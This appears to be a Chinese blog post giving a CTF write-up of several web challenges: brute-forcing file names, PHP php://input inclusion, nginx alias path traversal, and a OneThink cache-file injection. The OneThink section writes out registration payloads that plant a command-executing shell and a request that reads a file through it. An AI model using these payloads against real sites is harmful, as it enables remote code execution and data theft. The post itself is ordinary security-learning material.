<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>shijian - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>Home</span></a>
        <a href="/archives" title="Archives"><i class="fa fa-archives"></i><span>Archives</span></a>
        <a href="/tags" title="Tags"><i class="fa fa-tags"></i><span>Tags</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">Recent Posts</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="click to search...">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">Author</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="Last edited at&nbsp;2019-05-18">2019-05-18</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">shijian</h2>
            <div class="post-meta">
                emm... 4452 words in the article |
                you are the&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>th friend who reading now
            </div>
        </div>
        <div class="post-content markdown-body">
            <h2 id="时间"><a href="#时间" class="headerlink" title="时间"></a>时间</h2><p>老大说这题做出来随缘，老大的缘来了，我的没有来。。不过好得有一个人做出来了。。。<br>这个主要就是要在10秒内先刷新那个页面，然后用7kbscan进行爆破。<br>爆破方式如下：<br><img src="/2019/05/18/shijian/shijian-73f54103.png" alt><br>字典的生成方式如下：<br><img src="/2019/05/18/shijian/shijian-a8a786a6.png" alt></p>
<h2 id="象棋"><a href="#象棋" class="headerlink" title="象棋"></a>象棋</h2><p>这道题和前一道题很像，看起来很复杂，也只是简单的爆破操作：<br>查看源码，看到一处奇怪的地方：<br><img src="/2019/05/18/shijian/shijian-64542127.png" alt><br>有了这个规则，接下来爆破：<br>用bp爆破：<br>模式选择Cluster bomb，设置三个payload位置：js/$w1$$w2$ctf$w3$.js<br>w1: simple list [abcmlyx]<br>w2: simple list [abcmlyx]<br>w3: number 100-999 step 1<br>也可以进行写脚本。。</p>
<h2 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h2><p>这道题查看源码后，老大给了脚本，有个厉害又有耐心的老大真好<br><img src="/2019/05/18/shijian/shijian-cbcd6ec2.png" alt><br>这个题的主要意思是，post的参数是flag的某三位，然后如果post的值是atttack就返回flag。就相当于构造了一个数组。每一个都是“123”：“attack”，然后取爆破。</p>
<h2 id="include"><a href="#include" class="headerlink" title="include"></a>include</h2><p>查看 allow_url_include为on<br><img src="/2019/05/18/shijian/shijian-3fa22741.png" alt><br>所以可以文件包含，用php://input<br>payload:<br><img src="/2019/05/18/shijian/shijian-c677dff3.png" alt><br>找flag目录：<br><img src="/2019/05/18/shijian/shijian-66d3264d.png" alt><br>读取flag：<br><img src="/2019/05/18/shijian/shijian-403ffb1f.png" alt></p>
<h2 id="Zone"><a href="#Zone" class="headerlink" title="Zone"></a>Zone</h2><p>这道题有点恶心啊。。。它的点太偏了，我觉得。<br>首先抓包。看到login为0，改为login为1。然后可以发现进入了后台，进入以后可以发现manages/admin.php，进入后那里这个样子（万分记得login永远改为1）：<br><img src="/2019/05/18/shijian/shijian-191edb6d.png" alt><br>看到红色的部分可以看出来文件可以跳转，在向上访问时../被替换为空，于是构造如下url访问NGINX配置文件：<br><img src="/2019/05/18/shijian/shijian-c9405b85.png" alt><br>访问后看到如下内容：</p>
<p>#user  nobody;<br>worker_processes  1;</p>
<p>#error_log  logs/error.log;</p>
<p>#error_log  logs/error.log  notice;</p>
<p>#error_log  logs/error.log  info;</p>
<p>#pid        run/nginx.pid;</p>
<p>events {<br>    worker_connections  1024;<br>}</p>
<p>http {<br>    include       mime.types;<br>    default_type  application/octet-stream;</p>
<pre><code>#log_format  main  &apos;$remote_addr - $remote_user [$time_local] &quot;$request&quot; &apos;
#                  &apos;$status $body_bytes_sent &quot;$http_referer&quot; &apos;
#                  &apos;&quot;$http_user_agent&quot; &quot;$http_x_forwarded_for&quot;&apos;;

#access_log  logs/access.log  main;

sendfile        on;
#tcp_nopush     on;

#keepalive_timeout  0;
keepalive_timeout  65;

#gzip  on;

#server {
#    listen       80;
#    server_name  localhost;

    #charset koi8-r;

    #access_log  logs/host.access.log  main;

#    location / {
#        root   html;
#        index  index.html index.htm;
#    }

    #error_page  404              /404.html;

    # redirect server error pages to the static page /50x.html
    #
#    error_page   500 502 503 504  /50x.html;
#    location = /50x.html {
#        root   html;
#    }

    # proxy the PHP scripts to Apache listening on 127.0.0.1:80
    #
    #location ~ \.php$ {
    #    proxy_pass   http://127.0.0.1;
    #}

    # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
    #
    #location ~ \.php$ {
    #    root           html;
    #    fastcgi_pass   127.0.0.1:9000;
    #    fastcgi_index  index.php;
    #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;
    #    include        fastcgi_params;
    #}

    # deny access to .htaccess files, if Apache&apos;s document root
    # concurs with nginx&apos;s one
    #
    #location ~ /\.ht {
    #    deny  all;
    #}
#}


# another virtual host using mix of IP-, name-, and port-based configuration
#
#server {
#    listen       8000;
#    listen       somename:8080;
#    server_name  somename  alias  another.alias;

#    location / {
#        root   html;
#        index  index.html index.htm;
#    }
#}


# HTTPS server
#
#server {
#    listen       443 ssl;
#    server_name  localhost;

#    ssl_certificate      cert.pem;
#    ssl_certificate_key  cert.key;

#    ssl_session_cache    shared:SSL:1m;
#    ssl_session_timeout  5m;

#    ssl_ciphers  HIGH:!aNULL:!MD5;
#    ssl_prefer_server_ciphers  on;

#    location / {
#        root   html;
#        index  index.html index.htm;
#    }
#}
include  sites-enabled/default;
</code></pre><p>}<br>看到最后发现有点意思，访问一下include的文件：<br><img src="/2019/05/18/shijian/shijian-add611e2.png" alt><br>结果看到一下内容：</p>
<pre><code>                    server {
listen 80 default_server;
listen [::]:80 default_server ipv6only=on;

root /var/www/html;
index index.php index.html index.htm;

server_name localhost;

location / {
    try_files $uri $uri/ =404;
    location ~ \.php$ {
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
        #fastcgi_pass unix:/var/run/php5-fpm.sock;
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_index index.php;
        include fastcgi_params;
    }
}

error_page 404 /404.html;

error_page 500 502 503 504 /50x.html;
location = /50x.html {
    root /var/www/html;
}

location /online-movies {
        alias /movie/;
        autoindex on;
    }

location ~ /\.ht {
    deny all;
}
</code></pre><p>}<br><img src="/2019/05/18/shijian/shijian-b918749f.png" alt><br>这部分很重要，因为有一个autoindex on也就是开启了目录遍历，然后alias /movie/替换匹配部分的url，也就是说如果我访问/online-movies../就会变成访问/movie/../.再加上目录遍历就可读取任意文件了。最后构造如下url获得flag，movie后面的/就是可以遍历目录：<br>构造flag：<br><img src="/2019/05/18/shijian/shijian-67644d66.png" alt></p>
<h2 id="OneThink"><a href="#OneThink" class="headerlink" title="OneThink"></a>OneThink</h2><p>这道题主要是去网上找一下有关OneThink的漏洞，最关键的点事要在bp里面改包，否则其他的地方的话，就没有效果。<br>注册下面2个帐号：<br>%0a$a=$_GET[a];//<br>%0aecho <code>$a</code>;//<br>然后依次登录，这里要注意顺序，因为先登录的会先写进缓存文件,顺序写反了就执行不了了。最后访问：<br>/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php<br>得到flag。这里的目录是固定的，只要是OneThink便都是这个目录，记下来。</p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>现在已经凌晨一点了，快提交了，睡觉了。。。今天收获超级大的。还是很开心。。继续加油！！！！！！！！！！！！！！！！！！！！！！！！！！！！！</p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> Donate
            </a>
        </div>
        
        <div class="post-tags">Tags：
            
            <a href="/tags/i春秋-web-ctf/">i春秋 web ctf</a>
            
        </div>
        
    </article>
    
    <p style="text-align: center">This article just represents my own viewpoint. If there is something wrong, please correct me.</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="About">About</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="Help">Help</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="Links">Links</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="SiteMap">SiteMap</a>
        </p>
        <p>
            Has been established&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbspDays，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">Based on Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a><br>
            ©2017-<span id="cpYear"></span> Based on&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，Theme by&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，Author&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="Input query keywords here...">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
